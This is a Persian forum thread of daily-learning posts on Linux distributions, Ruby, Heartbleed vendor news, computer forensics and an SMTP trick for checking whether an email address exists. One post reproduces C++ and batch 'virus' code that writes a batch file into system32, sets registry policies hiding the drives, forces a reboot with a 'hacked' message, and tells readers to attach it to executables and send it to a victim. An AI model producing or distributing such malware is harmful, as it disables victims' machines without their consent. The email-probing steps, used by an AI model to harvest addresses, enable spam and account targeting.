چیز هایی که هر روز یاد میگیرم !!!

[iut.ali]

سلام چند وقت پیش داشتم تو یه سایتی میچرخیدم که یهو چشمم به تاپیکی با این عنوان افتاد دیدم بد نیست یه همچین تاپیکی رو هم اینجا داشته باشیم البته شاید مطالب پراکنده باشه ولی به نطرم اشکالی نداشته باشه واسه اواین پست روشی رو میذارم که با اون بدون ارسال ایمیل میتونید بفهمید این ایمیل وجود داره یا نه

 

[iut.ali]

واسه اولین گام باید name server ها رو بدست بیاریم واسه همین وارد command line میشیم و میزنیم

nslookup -type=mx gmail.com

که به جای gmail.com میتونیم هر سرویس دهنده ی دیگه ای رو بذاریم نتایج واسه من اینا شدند

gmail.com MX preference=30, exchanger = alt3.gmail-smtp-in.l.google.com
gmail.com MX preference=20, exchanger = alt2.gmail-smtp-in.l.google.comgmail.com MX preference=5, exchanger = gmail-smtp-in.l.google.comgmail.com MX preference=10, exchanger = alt1.gmail-smtp-in.l.google.com gmail.com MX preference=40, exchanger = alt4.gmail-smtp-in.l.google.com

خب حالا با telnet به یکی از اینا وصل میشیم

telnet gmail-smtp-in.l.google.com 25

که 25 شماره پورتیه که ازش واسه اتصال استفاده میکنم خب حالا وقت سلام گفتنه با حروف بزرگ میزنیم HELO
حالا باید خودمونو بشناسونیم پس میزنیم

mail from:<abc@abc.com>

تو این مرحله آدرسی که میزنیم اصلا مهم نیس و هر چی میتونه باشه
مرحله بعدی وارد کردن آدرسیه که میخوایم ببینیم وجود داره یا نه پس میزنیم

rcpt to:<folan@folan.com>

نتایجی که نشون میده واضحه فک نکنم نیازی به توضیح اضافه باشه

 

[iut.ali]

در این پست قصد دارم شما رو با یک توزیع بسیار عالی از لینوکس آشنا کنم

نام این توزیع ​

Scientific Linux​

یا لینوکس علمی-پژوهشی هست که محصولی است از چند لابراتوار و موسسه ی علمی بزرگ جهان مثل​

CERN​

یا ​

Fermilab ​

و ... که با اهداف علمی پژوهشی تولید شده

در این لینوکس شما ابزارهای فوق العاده ای جهت پیشبرد فعالیت های علمی دارید و این ابزارها کاملا به روز هستند و مطابق با آخرین دستاوردهای علمی

نکته ی جالب توجه اینکه ذره ی بوزن هیگز که اخیرا کشف شد و به "ذره ی خدا" (توصیه میکنم حتما در مورد این ذره بخونید واقعا جالبه)شهرت پیدا کرد هم کشف خودش رو مدیون عوامل بسیاری هست و یکی از اون عوامل همین Scientific Linux بود


دوستانی که در بحث های تخصصی مربوط به امنیت فعالیت داشتند سیستم عامل بک ترک رو انتخاب می کردند

این نسخه هم سفارش ماست به عزیزانی که مشغول فعالیت های علمی در زمینه های فیزیک و شیمی و نجوم و ... هستند
(به نقل از سایت آشیانه)​

لینک دانلود :

https://www.scientificlinux.org/download

چند عکس از محیط این سیستم عامل :​

 

[iut.ali]

سلام امروز یه کد ویروس به زبان c++ رو میذارم البته پیشنهاد میکنم اینو رو سیستم خودتون run نکنید(به نقل از سایت bitshacking.com )

C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main() {
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" );
/*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n";
write.close();
//close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL);
return 0; }
Copy the above code and paste in notepad Save the file with .cpp extension Compile and create .exe file in cpp Note: Don't run this c++ program ,
it will attack your system itself. Copy the created .exe file and send it to your victim.
You can also attach it with any other exe files. Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n shutdown -r -c \"Sorry Your System is hacked by us!\" -f I think this code will simple for non c++ programmers. It is easy to create the batch file also. Copy the above code to notepad. Save it with .bat extension (for ex: nodrivevirus.bat) Send the file to your victim


​

 

[iut.ali]

[h=5]اوبونتو ۱۴.۰۴ با نام عمومی Trusty Tahr منتشر شد![/h]تیم اوبونتو با افتخار خبر از انتشار پنجمین نسخه LTS با پشتیبانی طولانی مدت اوبونتو با نام عمومی "Trusty Tahr" برای میزکار، سرویسگرها، ابرها و هسته سایر محصولات میدهد. این نسخه نیز ادامه راه اوبونتو در عرضه بهترین و جدیدترین تکنولوژی‌های دنیای متن‌باز در یک توزیع با کیفیت و کاربری آسان است.

اوبونتو ۱۴.۰۴ اولین انتشار با پشتیبانی طولانی مدت اوبونتو است که سکوی سخت‌افزاری "arm64" و همچنین "ppc64el" را پشتیبانی می‌کند. در این نسخه بهینه‌سازیهای بسیاری برای Unity و AppArmor انجام شده است.

نسخه سرور اوبونتو ۱۴.۰۴ دارای انتشار Icehouse مجموعه OpenStack همراه با ابزارهای پیاده‌سازی و مدیریتی است که سعی دارد در زمانِ مدیرانِ راه‌اندازیِ سیستم در رایانش ابری صرفه‌جویی شود. تکنولوژی‌های کلیدی سرورها شامل MAAS و Ceph با استفاده از نسخه‌های بالادستی بروزآوری شده‌اند.

لینک دانلود

http://www.ubuntu.com/download

(به نقل از forum.ubuntu.ir )

 

[iut.ali]

زبان برنامه نویسی روبی

روبی (به انگلیسی: Ruby) یک زبان برنامه‌نویسی انعطافپذیر، پویا و شی‌گرا است. روبی ویژگی‌های نگارشی پرل و شی‌گرایی اسمال‌تاک را با هم در خود دارد. زبان روبی در سال‌های میانی دهه ۱۹۹۰ توسطیوکیهیرو ماتسوموتو در ژاپن اختراع شد. ویژگی‌های گوناگون زبان‌های پرل، لیسپ، اسمال‌تاک و آیفل الهام‌بخش ماتسوموتو در ساخت روبی بودند.
زبان روبی پارادایم‌های گوناگون برنامه‌نویسی از جمله برنامه‌نویسی تابعی، شیء گرا و بازتابی را پشتیبانی می‌کند، دارای گزاره‌ها و متغیرهای پویا و مدیریت حافظه خودکار است.
نسخه فعلی این زبان Ruby 1.9.1 است که به زبان سی و بصورت زبانی با مفسر تک‌گذره پیاده‌سازی شده است.[SUP][۱][/SUP] تا سال ۲۰۱۰، گونه‌های مختلفی از زبان روبی توسعه یافته‌اند که از میان آنها می‌توان بهجی‌روبی، روبینوس، مک‌روبی، آیرن‌روبی و هات‌روبی اشاره کرد.



[h=2]فلسفه[/h]سازنده زبان روبی یوکیهیرو ماتز ماتسوموتو می‌گوید روبی برای افزایش توان تولید و تفریح برنامه‌نویسان طراحی شده است و از اصل رابط کاربری خوب پیروی می‌کند. او تأکید می‌کند که طراحی سامانه‌ها باید بیشتر روی نیاز انسان‌ها متمرکز باشد تا رایانه‌ها. اغلب مردم، به ویژه برنامه‌نویسان، روی ماشین‌ها تمرکز می‌کنند. آن‌ها فکر می‌کنند "با انجام این کار ماشین‌ها سریعتر می‌شوند، ماشین‌ها در اجرا موثرتر می‌باشند و ..." آن‌ها بر ماشین تمرکز می‌کنند، اما در حقیقت ما نیاز داریم که به انسان‌ها توجه کنیم، اینکه چگونه آنها به برنامه‌نویسی توجه دارند و یا چگونه به اجرای برنامه‌های ماشین دقت می‌کنند. روبی برای تعقیب هدف کمترین غافلگیری بیان شدبه این معنی که زبان باید طوری رفتار کند که کمترین گیج‌کنندگی را برای استفاده‌کننده‌های آن داشته باشد. ماتسوموتو همچنین اظهار می‌دارد که هدف اولین طراحی او درست کردن زبانی که خودش از آن لذت ببرد بود. این کار با کم کردن کار برنامه‌نویس و ابهامات منطقی می‌باشد. اما کمترین غافلگیری هنوز خیلی به بیان زبان برنامه نویسی روبی نزدیک است. افراد ناشی شاید این را به این معنا تعبیر کنند که رفتارهای روبی سعی در متصل کردن اشتراکات رفتارهای دیگر زبان‌ها را دارد. در بحث ماه می ۲۰۰۵ در روزنامه "کامپ.لنگ.روبی" ماکسوموتو تلاش کرد که روبی را از مینیمم غافلگیری دور کند. توضیح اینکه هر شانس طراحی بعضی‌ها را متعجب می‌کند. او از استاندارد خود برای ارزیابی غافلگیری استفاده کرد. ماتسوموتو این را در یک گزارش مطرح ساخت. "همه یک پیشینه شخصی دارند، بعضی‌ها از جانب پایتون می‌آیند بعضی‌های دیگه از پرل و آن‌ها ممکن است از بعضی از جنبه‌های متفاوت زبان غافلگیر شوند. سپس آن‌ها به من می‌گویند ما از بعضی از جنبه‌های زبان غافلگیر شدیم، بنابرین روبی قانون کمترین غافلگیری را زیر پا گذاشته است. صبر کنید... هدف کمترین غافلگیری فقط برای شما نیست. این هدف به معنای کمترین غافلگیری ممکن برای بیان من می‌باشد. این به معنای کمترین غافلگیری بعد از آموزش کامل زبان است. برای مثال من قبل از اینکه روبی را طراحی کنم یک برنامه‌نویس سی‌پلاس‌پلاس بودم. من منحصراً دو، سه سال در سی‌پلاس‌پلاس برنامه نوشتم و بعد از دو سال برنامه‌نویسی با آن، هنوز مرا متعجب می‌کرد."
یکی از مهم ترین و بهترین برنامه هایی که من میدونم با روبی نوشته شده برنامه ی metasploit هست که جزء ده برنامه ی تاپ در هکینگ به حساب میاد
(به نقل از fa.wikipedia.org )

 

[iut.ali]

بعد از پیدا شدن آسیب پذیری SSL یا OpenSSL Heartbleed شرکت اپل ادعای عجیبی کرده : [h=1]اپل در برابر خونریزی قلبی مقاوم است![/h]به نقل از مرکز ماهر، كاربران iOS و OS X می‌توانند نفس راحتی بكشند زیرا دستگاه‌های آن‌ها تحت تاثیر رخنه امنیتی OpenSSL Heartbleed قرار ندارند اما اگر برای پیام‌های خصوصی بر روی iOS از BBM استفاده می‌كنند، باید در حال حاضر استفاده از آن را متوقف کنند.


شركت اپل اعلام كرد محصولات این شركت تحت تاثیر آسیب پذیری موجود در OpenSSL قرار ندارد. این شركت از كتابخانه متفاوت SSL/TLS با نام SecureTransport استفاده می‌كند كه در ماه فوریه تحت تاثیر یک مشكل جدی قرار گرفت اما به خطرناكی رخنه Heartbleed نبود.

شركت بلک بری تایید كرد كه چندین محصول آن از جمله BBM برای iOS و اندروید تحت تاثیر آسیب پذیری Heartbleed قرار دارند. BBM در سراسر جهان حدود 80 میلیون كاربر دارد. سایر محصولات آسیب پذیر بلک بری شامل Secure Work Space برای iOS و اندروید و BlackBerry Link برای ویندوز و سیستم عامل مكینتاش می‌باشند.

​

در حال حاضر این شركت اصلاحیه‌ای برای محصولات آسیب پذیر خود منتشر نكرده است و بدتر از آن هیچ راه حلی برای مقابله با آسیب پذیری در BBM یا Secure Work Spaces اعلام نكرده است. محصولات اصلی بلک بری مانند گوشی‌های هوشمند بلک بری، BlackBerry Enterprise Server 5 و BlackBerry Enterprise Service 10 تحت تاثیر این آسیب پذیری قرار ندارند.

آمازون تایید كرده است كه نسبت به این رخنه، آسیب پذیر است و افرادی كه از ELB، EC2 ، OpsWorks، Elastic Beanstalk و CloudFront استفاده می‌كنند، تحت تاثیر تهدید ناشی از این رخنه قرار می‌گیرند.

روز پنج شنبه موزیلا اعلام كرد كه پروژه تایید هویت این شركت، Persona و Firefox Account تحت تاثیر آسیب پذیری Heartbleed قرار دارد. سرورهای آن ها در AWS اجرا می‌شود در حالی كه ارتباطات رمزگذاری شده TLS به AWS ELB كه از OpenSSL استفاده می‌كنند منتهی می‌شود.

 

[iut.ali]

پزشک قانونی کامپیوتر( !!!

forensic چیست ؟

این علم یکی از علوم جالب در زمینه کامپیوتر "علم پزشکی قانونی کامپیوتر" می باشد که با عنوان forensic شناخته می شود.
به منظور انجام فرآيند بررسی و رديابی حملات هکرها و استخراج شواهد جهت ارائه به مراجع قانونی و جلوگيری از تکرار اين حملات ، در سال 2004 ، شرکت E-Council مدرک جدیدی را با نام CHFI معرفی نمود . اين مدرک جهت آن دسته از افرادی است که مبادرت به کاوش و بررسی عمیق تر در زمان پس از وقوع حملات هکرها مانند جمع آوری شواهد به منظور پیگرد قانونی می ورزند .
اين دوره به افراد این قابلیت را می دهد که مسیر یک هکر را تعقیب نموده و در نهایت به مجرم اصلی دست یابند . متخصص CHFI می تواند شواهد مختلفی را در انواع جرائم رايانه ای ، سوء استفاده های بازرگانی و کلاهبرداری ها به دست آورده و طی یک پروسه و با انجام تحقیقات و آنالیز و بررسی تکنيک های ممکن ، جای پای هکر را پیدا نموده و به مراجع قانونی ارائه نمايد . وی از طریق طراحی متدهای درست ، توانایی کشف اطلاعات سیستم های کامپیوتری را داشته و قادر به بازيابی اطلاعات پاک شده یا رمز گذاری شده و یا حتی فایل های خراب نيز می باشد .
من که یه جورایی مجذوبش شدم رفتم برم دنبالش !!(انگار نه انگار که ریاضی 2و فیزیک 2 دارم میفتم )
به نقل از سایت

ashiyane.org

​